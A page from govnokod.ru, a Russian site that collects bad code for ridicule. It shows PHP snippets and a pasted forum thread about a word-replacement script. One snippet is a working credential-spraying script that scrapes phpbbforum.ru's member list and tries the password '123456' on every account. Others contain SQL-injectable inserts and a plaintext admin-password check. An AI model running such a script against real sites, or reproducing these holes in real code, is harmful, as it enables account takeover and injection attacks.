- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
$ix=$_POST['danue'];
if(isset($_POST['danue'])){
$reyd="INSERT INTO `NOVOSTI` (`CONNTEKT`) VALUES ('{$ix}')";
$rido=mysql_query($reyd) or die ("no dannuch");
header ('location: index.php');}
Нашли или выдавили из себя код, который нельзя назвать нормальным, на который без улыбки не взглянешь? Не торопитесь его удалять или рефакторить, — запостите его на говнокод.ру, посмеёмся вместе!
+160
$ix=$_POST['danue'];
if(isset($_POST['danue'])){
$reyd="INSERT INTO `NOVOSTI` (`CONNTEKT`) VALUES ('{$ix}')";
$rido=mysql_query($reyd) or die ("no dannuch");
header ('location: index.php');}
+159
define(hostname, 'http://phpbbforum.ru');
$file = './txt/users_phpbb.txt';
function get_users($data)
{
preg_match_all('!">(.*?)</a></b>!', $data, $users);
return $users[1];
}
function get_num_users($data)
{
preg_match_all('!">(.*?)</a></b>!', $data, $users);
return count($users[1]);
}
function get_num_pages($data)
{
preg_match('!">(\d{1,8})</a><form action!', $data, $num_pages);
return $num_pages[1];
}
function curl_header($url)
{
$ch = curl_init ($url);
curl_setopt($ch, CURLOPT_USERAGENT, useragent);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function brut($url)
{
$data = curl_header($url);
$count = substr_count($data, 'Cookie');
if($count == 2)
return false;
else
return true;
}
function get_pages($num)
{
global $users_per_page;
for($i = 0; $i<$num; $i++)
$data .= req(hostname . '/memberlist.php?mode=posts&order=DESC&start=' . $users_per_page * $i);
return $data;
}
if(!file_exists($file))
{
$data = req(hostname.'/memberlist.php');
$users_per_page = get_num_users($data);
$num_pages = get_num_pages($data);
$pages = get_pages($num_pages);
$users = get_users($pages);
$fp = fopen($file, 'w');
$users = implode("\n", $users);
fputs($fp, $users);
fclose($fp);
}
$users = file_get_contents($file);
$users = explode("\n", $users);
$count = count($users);
$pass = '123456';
for($i = 0; $i<$count; $i++)
{
if( brut(hostname.'/login.php?username='.urlencode($users[$i])."&password=$pass") )
$good[] = $users[$i];
}
$fp = fopen("./txt/$pass.txt", 'a+');
fputs($fp, implode("\n", $good));
fclose($fp);
print_r($good);
+172
<?php
$strings = array();
$strings[] = "10_strings_0";
$strings[] = "10_strings_1x";
$strings[] = "10_strings_2";
$strings[] = "10_strings_3";
$strings[] = "10_strings_4x";
$strings[] = "10_strings_5x";
$strings[] = "10_strings_6";
$strings[] = "10_strings_7x";
$strings[] = "10_strings_8";
$strings[] = "10_strings_9";
// СПИСОК СТРОК ИЗ 100 СТРОК В КОТОРЫХ БУДЕТ ОСУЩЕСТВЛЯТЬСЯ ПОИСК СТРОК ИЗ СПИСКА $strings
for ($counter=0; $counter<100; $counter++)
{
$check_strings[] = "10_strings_".$counter;
}
// Временная папка - папка со скриптом
// создание vbs файлов
for ($strings_c=0; $strings_c<sizeof($strings); $strings_c++)
{
$file = fopen($strings[$strings_c].'.vbs', 'w');
fwrite($file, 'Set Program = Wscript.CreateObject("Wscript.Shell")'.PHP_EOL.'Program.Run("'.$strings[$strings_c].'.bat'.'")'.PHP_EOL.'Wscript.Quit');
fclose($file);
}
// создание bat файлов
$interpreter_root = 'C:\xampp\php\php.exe'; // путь к PHP интерпретатору
for ($strings_c=0; $strings_c<sizeof($strings); $strings_c++)
{
$file = fopen($strings[$strings_c].'.bat', 'w');
fwrite($file, $interpreter_root.' '.$strings[$strings_c].'.php');
fclose($file);
}
// создание php файлов
for ($strings_c=0; $strings_c<sizeof($strings); $strings_c++) {
$code = '<?php
$string = \''.$strings[$strings_c].'\'; // строка для проверки, в каждом экземпляре своя
for ($counter=0; $counter<100; $counter++)
{
$check_strings[] = "10_strings_".$counter;
}
shuffle($check_strings);
$ok = false;
for ($check_strings_c=0; $check_strings_c<sizeof($check_strings); $check_strings_c++)
{
if ($string == $check_strings[$check_strings_c])
{
$ok = true;
break;
}
}
if ($ok == true)
{
$file = fopen("'.$strings[$strings_c].'_ok.txt", "w");
fclose($file);
}
?>';
$file = fopen($strings[$strings_c].'.php', 'w');
fwrite($file, $code);
многопоточность на PHP
+151
function pro($input) {
$input=str_replace("\0", '_', $input);
$input=trim($input);
$input=strtr($input,array('!'=>'!','"'=>'"','$'=>'$','%'=>'%',"'"=>"'",'('=>'(',')'=>')','*'=>'*','+'=>'+',','=>',','-'=>'-','.'=>'.','/'=>'/',':'=>':','<'=>'<','='=>'=','>'=>'>','?'=>'?','@'=>'@','['=>'[','\\'=>'\',']'=>']','^'=>'^','_'=>'_','`'=>'`','{'=>'{','|'=>'|','}'=>'}','~'=>'~'));
return $input;
}
function depro($input) {
$input=strtr($input,array('!'=>'!','"'=>'"','$'=>'$','%'=>'%',"'"=>"'",'('=>'(',')'=>')','*'=>'*','+'=>'+',','=>',','-'=>'-','.'=>'.','/'=>'/',':'=>':','<'=>'<','='=>'=','>'=>'>','?'=>'?','@'=>'@','['=>'[','\'=>'\\',']'=>']','^'=>'^','_'=>'_','`'=>'`','{'=>'{','|'=>'|','}'=>'}','~'=>'~'));
return $input;
}
во всяком случае аффтар считает что это действительно защита не в рот ибацца, anti sql inj.. это вам не это.
+160
if( isset( $_POST['username'] ) && $_POST['username'] != '' ) {
$username = $_POST['username'];
$password = $_POST['password'];
$rs = mysql_query( "select * from admin" );
$row = mysql_fetch_array( $rs ) ;
//echo "$username == $row[username] && $password == $row[password]";
if( $username == $row['username'] && $password == $row['password'])
{
session_register( 'ADMIN_NAME' );
$_SESSION['ADMIN_NAME'] = $row['name'];
header( "Location: home.php" );
exit;
} else
$err = "Your Username and Password is invalid";
}
Это же просто песня! К слову: сайт был написан румынскими кодерами чуть больше года назад.
+162
if ($is_home) {
echo '<script>
function chkcbfrm() {
var el = $(\'#inppleasecallback\')[0];
if ((el.value == \'\') || (el.value == el.defaultValue)) {
alert(\'Введите номер телефона...\');
return false;
} else
return true;
}
</script>';
echo '<form method="post" id="frmcallback" onsubmit="return chkcbfrm();">';
echo '<p>Введите пожалуйста телефон в формате +7-3812-XXXXXX</p>';
echo '<input type="text" class="textboxcontact" style="width: 220px" id="inppleasecallback" name="please_callback" value="Введите номер телефона" onfocus="if(this.value==this.defaultValue) this.value=\'\';" onblur="if(this.value==\'\') this.value = this.defaultValue;" />';
echo '<a href="#" class="butmore" onclick="if (chkcbfrm()) $(\'#frmcallback\').submit(); return false;">Перезвоните</a>';
echo '<form>';
} else {
$ЕБАНУТЫЙ_ТЕКСТ = 'Введите пожалуйста телефон в формате +7-3812-XXXXXX (код страны - код города - номер), название организации, ФИО контактного лица и предмет интереса (XXX, XXX, металлопрокат, XXXXXX, крановое хозяйство)';
echo '<form method="post" id="frmcallback" onsubmit="if ($(\'#inppleasecallback\')[0].value == $(\'#inppleasecallback\')[0].defaultValue) { alert(\'Введите номер телефона...\'); return false; }">';
echo '<textarea class="textareacontact" style="width: 220px; height: 150px;" id="inppleasecallback" name="please_callback" onfocus="if(this.value==this.defaultValue) this.value=\'\';" onblur="if(this.value==\'\') this.value = this.defaultValue;">'.$ЕБАНУТЫЙ_ТЕКСТ.'</textarea>';
echo '<input class="submitcontact" type="submit" value="Перезвоните" />';
echo '<form>';
}
по просьбе заказчика текст менялся 2-3 раза на дню, за что и получил такое название
+158
<table border="1" class="new" bgcolor ="#F5F5F5">
<tr>
<td><b>День</b></td>
<td><b>До обеда</b></td>
<td><b>После обеда</b></td>
<?php
while ($row = mysql_fetch_assoc($query)){
$date = $row['date'];
$Id_date = convert($date);
$date = substr ($date,8);
//Проверка на повторность дня (один день-два события!)
if ($count == $date){
$time = $row['time'];
if ($time == 'До обеда'){
echo '<td>';
$judge = $row['judge'];
$query1 = mysql_query ("SELECT `desc` FROM `judge` WHERE `id` = $judge",$db);
$row1 = mysql_fetch_assoc ($query1);
$judge1 = $row1['desc'];
//"Совещание" красным
if ($judge1 == 'Совещание'){
echo "<td class='new_color'>$judge1</td>";
}
else{
echo "<td>$judge1</td>";}
echo "</td>";
}
elseif ($time == 'После обеда'){
$judge = $row['judge'];
$query1 = mysql_query ("SELECT `desc` FROM `judge` WHERE `id` = $judge",$db);
$row1 = mysql_fetch_assoc ($query1);
$judge1 = $row1['desc'];
if ($judge1 == 'Совещание'){
echo "<td class='new_color'>$judge1</td>";
}
else{
echo "<td>$judge1</td>";}
echo "</td>";
echo "</tr>";
}
}
// Блок для выполнения при отрицательной проверки на повторность дня
else {
$res1 = rus_days($Id_date);
echo "<tr>";
echo "<td>$date $res1</td>";
$time = $row['time'];
if ($time == 'До обеда'){
$judge = $row['judge'];
$query1 = mysql_query ("SELECT `desc` FROM `judge` WHERE `id` = $judge",$db);
$row1 = mysql_fetch_assoc ($query1);
$judge1 = $row1['desc'];
if ($judge1 == 'Совещание'){
echo "<td class='new_color'>$judge1</td>";
}
else{
echo "<td>$judge1</td>";}
}
elseif ($time == 'После обеда'){
echo "<td>";
$judge = $row['judge'];
$query1 = mysql_query ("SELECT `desc` FROM `judge` WHERE `id` = $judge",$db);
$row1 = mysql_fetch_assoc ($query1);
$judge1 = $row1['desc'];
if ($judge1 == 'Совещание'){
echo "<td class='new_color'>$judge1</td>";
}
else{
echo "<td>$judge1</td>";}
echo "</td>";
echo "</tr>";
}
Формирование таблицы. Данные тянутся из БД.
+167
function suka($str){
$length = strlen($str);
for($i=1; $i<=$length; $i++){
$b = (-1)*$i;
$substrl .= substr($str, $b, 1);
}
echo $substrl;
}
$govno='jizni';
suka($govno);
Попросил соискателя написать функцию, которая перевернет строку. Просто хотелось посмотреть подход к коду.
+160
<?php
//Делаем массив
$_verbose = array(
"Вы не ввели слово которое хотите заменить!<br>
<form name='zadacha' action='2.php' method='post'>
<b>То что вставить:</b><br>
<input size='25' maxlength='70' name='zamena'><br><br>
<b>То что заменить:</b><br>
<input size='25' maxlength='70' name='slovo'><br>
<input type='submit' name='text' value='Изменить' style='background-color: #ffc66d; font-family: Tahoma Courier New; font: bolder 12px ;cursor: hand; height: 18px; color: #000; padding: 10px 20px 10px 20px'>
</form>",
"Вы не ввели слово которым будете изменять слово в документе!<br>
<form name='zadacha' action='2.php' method='post'>
<b>То что вставить:</b><br>
<input size='25' maxlength='70' name='zamena'><br><br>
<b>То что заменить:</b><br>
<input size='25' maxlength='70' name='slovo'><br>
<input type='submit' name='text' value='Изменить' style='background-color: #ffc66d; font-family: Tahoma Courier New; font: bolder 12px ;cursor: hand; height: 18px; color: #000; padding: 10px 20px 10px 20px'>
</form>",);
if(empty($_POST['slovo'])){
echo $_verbose[0];
exit;
}
if(empty($_POST['zamena'])){
echo $_verbose[1];
exit;
}
//Читаем файл из всех строчек в одну
$text = file_get_contents("1.txt");
//Меняем введеное из первой формы на второе
$text = str_replace($_POST['slovo'], $_POST['zamena'], $text);
// удаляем html и php тэги
$text = strip_tags($text);
// заменяем двойной пробел на одиночный
$text = str_replace(" ", " ", $text);
//удаляем пробелы с конца и начала
$text = trim($text);
//w - перезапись, a - дозапись
$flag_rc = "w";
//Открываем файл с параметром $flag_rc
$rc_file = fopen("1.txt", $flag_rc);
// применяем функцию блокировки файла с флагом записи
flock($rc_file, LOCK_EX);
// записываем в файл данные
fputs($rc_file, "$text");
// снимаем блокировку
flock($rc_file, LOCK_UN);
// закрываем дескриптор указывающий на файл
fclose($rc_file);
// Показываем результат и выходим
echo $text;
exit;
#########################################################
#А вот строчка которую надо куда то пихнуть для проверки#
#
#//Проверяем вписаны ли слова в свои формы #
#if(empty($_slovo)){ #
#echo $_verbose[0]; #
#exit; #
#########################################################
#if(empty($_zamena)){ #
#echo $_verbose[1]; #
#exit; #
#########################################################
?>
Этот говнокод - содержимое http://upwap.ru/993821 (первая ссылка, данная в ответ в копипасте ниже).
Мобильный форум Wap-разработчиков хостинга kmx.ru
Форум
Тема: Куда пихнуть этот кусок пхп?
Nelix 16.08.10 16:18
Вобщем вот ссылка на этот скрипт в архиве: http://lastbastion.kmx.ru/Zamena.rar //// Этот скрипт меняет одно слово на другое в тхт доке, можете протестить, всё работает... Я решил сделать фильтр там, на то что бы если в форме нет ничего то выводилась ошиб
Nelix 16.08.10 16:20
..ошибка и естественно выход, парметр emty , в архиве в коде его там найдете в комментах, и куда их пихнуть не знаю... либо ошибка выходит, либо не работает.. вчера написал в 3 раза больше код с ЭТИМИ же самыми проверками на запись в форме а седня не могу
Nelix 16.08.10 16:22
Посмотрите плиииззз и скажите что я не правильно делал там... весь день сижу над этой фигней:( гг
stallon 16.08.10 17:41
http://upwap.ru/993821 пароль kmx . С тебя пиво
Nelix 16.08.10 18:12
Работает))) Сочтемся как-нибудь) .пиво. а чем отличаются скобки квадратные от загнутых? Ну я имею ввиду не формой а в коде php, разница между ними есть какие надо использовать?
Nelix 16.08.10 18:17
Ая сча подумал и ещё вот так сделал: http://upwap.ru/993861 пароль kmx есть разница какая то в наших кодах? Работает одинаково совершенно...хм.. минусы плюсы? Если не сложно..
stallon 16.08.10 18:40
в фигурные скобки заключается условие какое-либо. в квадратные. много что
stallon 16.08.10 18:53
почитай о такой директиве как register_globals. мой код для рег_глобалс off, твой для рег_глобалс on. что нежелательно
Nelix 17.08.10 15:27
Почитал:) Но ничего не понял:( гг
+160
if($usershow != 0) {
$site->AddBlock('topnav', true, true, 'tn');
$var['nav'] = '';
$site->AddSubBlock('topnav', true, $var);
} else {
$site->AddBlock('topnav', true, true, 'tn');
$var['nav'] = $top_nav;
$site->AddSubBlock('topnav', true, $var);
}